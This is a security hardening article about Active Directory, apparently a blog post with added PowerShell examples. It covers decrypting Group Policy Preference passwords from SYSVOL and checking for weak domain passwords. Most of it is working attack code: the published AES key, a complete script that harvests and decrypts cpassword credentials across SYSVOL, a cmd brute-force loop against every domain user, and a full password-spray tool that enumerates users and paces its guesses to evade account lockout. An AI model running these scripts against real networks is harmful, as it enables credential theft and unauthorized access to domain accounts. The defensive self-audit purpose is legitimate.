Remove Passwords from Group Policy Preference (GPP) Files

Group Policy Preferences (GPP) extended Group Policy so that administrators could, among other things, create local accounts and set their passwords. Each such password lives in an XML file in SYSVOL on the domain controller, a share that every domain user can read. The password is encrypted, but with a fixed AES key that Microsoft itself published in the protocol documentation, so anyone who can read the file can decrypt any password stored in GPP. Microsoft addressed this in May 2014 with MS14-025 (https://technet.microsoft.com/en-us/library/security/ms14-025.aspx), which removed the ability to configure new passwords through GPP. The patch did not, however, touch passwords already sitting in existing GPP files. Even if you don't quite follow all of this, just run the following command from your work computer. If it returns anything, you have passwords openly exposed on your internal network. The command searches recursively through the XML files in SYSVOL on your logon domain controller for the attribute name 'cpassword':
findstr /S cpassword %logonserver%\sysvol\*.xml

%logonserver% expands to the UNC name of the domain controller that authenticated you (\\DCNAME), so the search runs against that DC's SYSVOL share, and /S makes findstr descend into every policy folder beneath it. The 'cpassword' value in each matching line (redacted in the original screenshot) is the encrypted password, which can be decrypted trivially with the published key. These passwords are often still valid administrator credentials.
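As an added example, not a command from the original article, the PowerShell script below does what the findstr one-liner does and then goes one step further: it parses each hit as XML and decrypts the cpassword value with the AES-256 key Microsoft published in the GPP protocol specification ([MS-GPPREF], "Password Encryption"). The SYSVOL default path and the sample Groups.xml at the end are mine; the sample is constructed at run time so the script runs offline and is self-checking.

```powershell
# Added example (not the article's code): find cpassword attributes in GPP
# XML files and decrypt them with the AES-256 key Microsoft published in the
# GPP protocol specification (MS-GPPREF, "Password Encryption").
# Assumptions (mine): the default SYSVOL path, and the constructed sample
# Groups.xml at the bottom, which exists only so the script runs offline.

# The published 32-byte key. It is public, which is the whole problem.
[byte[]]$GppAesKey = 0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                     0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b

function New-GppAes {
    # AES-256-CBC with PKCS7 padding and an all-zero IV, as GPP uses it.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key     = $GppAesKey
    $aes.IV      = New-Object byte[] 16
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    return $aes
}

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP drops the base64 '=' padding; restore it before decoding.
    $padded = $Cpassword + ('=' * ((4 - $Cpassword.Length % 4) % 4))
    $cipher = [Convert]::FromBase64String($padded)
    $aes    = New-GppAes
    try {
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    } finally { $aes.Dispose() }
    # The plaintext is the password encoded as UTF-16LE.
    return [System.Text.Encoding]::Unicode.GetString($plain)
}

function ConvertTo-GppCpassword {
    # Inverse of the above; used here only to build a realistic sample.
    param([Parameter(Mandatory)][string]$Password)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $aes   = New-GppAes
    try {
        $cipher = $aes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
    } finally { $aes.Dispose() }
    return [Convert]::ToBase64String($cipher).TrimEnd('=')
}

function Get-GppCpasswordFromXml {
    # Report every element that carries a cpassword attribute. This covers
    # Groups.xml as well as the other preference types that embed cpassword
    # (scheduled tasks, services, data sources, drive maps, printers).
    param([Parameter(Mandatory)][xml]$Xml, [string]$Source = '<inline>')
    foreach ($node in $Xml.SelectNodes('//*[@cpassword]')) {
        [pscustomobject]@{
            File     = $Source
            UserName = $node.GetAttribute('userName')
            RunAs    = $node.GetAttribute('runAs')
            Password = ConvertFrom-GppCpassword -Cpassword $node.GetAttribute('cpassword')
        }
    }
}

function Find-GppCpassword {
    # Walk SYSVOL (or any root) for XML files, exactly what the findstr
    # one-liner does, but parsing the XML and decrypting each hit.
    param([string]$Root = "$env:LOGONSERVER\SYSVOL")
    Get-ChildItem -Path $Root -Filter *.xml -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            try   { $doc = [xml](Get-Content -LiteralPath $_.FullName -Raw) }
            catch { return }                       # not well-formed XML; skip it
            Get-GppCpasswordFromXml -Xml $doc -Source $_.FullName
        }
}

# Constructed sample (not a real capture): the shape of a Groups.xml that sets
# a local account's password, with the cpassword produced by the routine above.
$sampleCpassword = ConvertTo-GppCpassword -Password 'Winter2015!'
$sampleXml = [xml]@"
<Groups>
  <User name="LocalAdmin">
    <Properties action="U" userName="LocalAdmin" cpassword="$sampleCpassword" neverExpires="1"/>
  </User>
</Groups>
"@
Get-GppCpasswordFromXml -Xml $sampleXml | Format-Table -AutoSize

# On a real domain, run it against SYSVOL instead:
# Find-GppCpassword | Format-Table -AutoSize
```

Two details matter when reading real files: the attribute name is lowercase 'cpassword' (which is why the findstr one-liner works without /I), and the stored base64 has its '=' padding stripped, so it must be restored before decoding or FromBase64String rejects it.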
Check For Weak Password Use

An attacker can move through your network by impersonating other users once their credentials are known, and chances are someone on your network is using a password that is all too easy to guess. But how do you find out? Try it yourself. This one-liner guesses a set of passwords against every user on the domain:
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DC-NAME\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DC-NAME\IPC$ > NUL

Create a list of all domain usernames in a file called users.txt, one username per line, and put your password guesses in a file called pass.txt, one per line. Substitute your domain name for DOMAIN and your domain controller's name for DC-NAME (both occurrences). Be careful about account lockout: the loop tries every line of pass.txt against each user in turn, and every failed guess counts against that user's bad-password count, so check the domain's lockout threshold first and keep the number of guesses per user well below it. To play it safe, use a single password guess per run, and wait out the lockout observation window before the next one. Here are some great password guesses you should try, because your tester will:
- Current Season Name and Year (e.g. Winter2015, Spring16)
- Variations on Company Name
- [email protected]
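The same guess-every-user idea, rewritten here as an added PowerShell example (not the article's one-liner) that reads the domain's lockout threshold before it starts, tries one password per round across all users so a long user list cannot lock anyone out, and builds the season-and-year guesses from the list above. It assumes a domain-joined machine and ordinary domain-user LDAP read rights; the domain name 'CORP.EXAMPLE' in the usage comment is a placeholder.

```powershell
# Added example (not the article's code): the same guess-every-user idea as the
# 'net use' loop, but with a lockout check up front and one guess per round.
# Assumptions (mine): you run it on a domain-joined machine as a domain user,
# the LDAP lookups below are permitted (they are for ordinary users by default),
# and the domain name passed to Invoke-PasswordGuess is yours.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

function Get-DomainUserNames {
    # Enumerate sAMAccountNames of enabled user accounts over LDAP, the
    # equivalent of hand-building users.txt. The bit filter drops disabled accounts.
    $searcher = [adsisearcher]'(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 1000
    $searcher.PropertiesToLoad.Add('sAMAccountName') | Out-Null
    foreach ($r in $searcher.FindAll()) { [string]$r.Properties['samaccountname'][0] }
}

function Get-DomainLockoutThreshold {
    # lockoutThreshold on the domain object: 0 means accounts never lock out,
    # any other value is the number of bad passwords that locks one.
    $rootDse = [ADSI]'LDAP://RootDSE'
    $domain  = [ADSI]"LDAP://$($rootDse.defaultNamingContext)"
    return [int]$domain.lockoutThreshold.Value
}

function Test-DomainCredential {
    # One authentication attempt. A failure counts against badPwdCount exactly
    # like a failed 'net use' in the article's one-liner does.
    param([string]$Domain, [string]$UserName, [string]$Password)
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('Domain', $Domain)
    try     { return $ctx.ValidateCredentials($UserName, $Password) }
    finally { $ctx.Dispose() }
}

function Get-SeasonGuesses {
    # Season + year, the first entry in the article's list of guesses to try.
    param([datetime]$Now = (Get-Date))
    $season = switch ($Now.Month) {
        { $_ -in 12, 1, 2 } { 'Winter' }
        { $_ -in 3, 4, 5 }  { 'Spring' }
        { $_ -in 6, 7, 8 }  { 'Summer' }
        default             { 'Fall' }
    }
    $yyyy = $Now.Year
    $yy   = $Now.ToString('yy')
    return @("$season$yyyy", "$season$yy", "$season$yyyy!", "$season$yy!")
}

function Invoke-PasswordGuess {
    param(
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][string[]]$Users,
        [Parameter(Mandatory)][string[]]$Passwords,
        [int]$SafetyMargin = 2     # stay this many guesses under the threshold
    )
    $threshold = Get-DomainLockoutThreshold
    if ($threshold -gt 0 -and $Passwords.Count -gt ($threshold - $SafetyMargin)) {
        $msg = "Refusing to run: $($Passwords.Count) guesses per user against a lockout threshold of $threshold. " +
               "Trim the list, or run one guess now and the next after the observation window."
        throw $msg
    }
    # Password-outer, user-inner: every account sees one guess per round,
    # which is what keeps a long user list from locking anyone out.
    foreach ($p in $Passwords) {
        foreach ($u in $Users) {
            if (Test-DomainCredential -Domain $Domain -UserName $u -Password $p) {
                [pscustomobject]@{ UserName = $u; Password = $p }
            }
        }
    }
}

# Usage (domain name and user source are placeholders for this example):
# $users = Get-DomainUserNames            # or: Get-Content .\users.txt
# Invoke-PasswordGuess -Domain 'CORP.EXAMPLE' -Users $users -Passwords (Get-SeasonGuesses) |
#     Format-Table -AutoSize
```

The threshold check is the part the cmd one-liner lacks: with lockoutThreshold set to, say, 5, this refuses to run more than three guesses per user in one go. It does not read the observation window, so between rounds you still have to wait it out yourself (the value is in the domain object's lockOutObservationWindow attribute) before the bad-password counters reset.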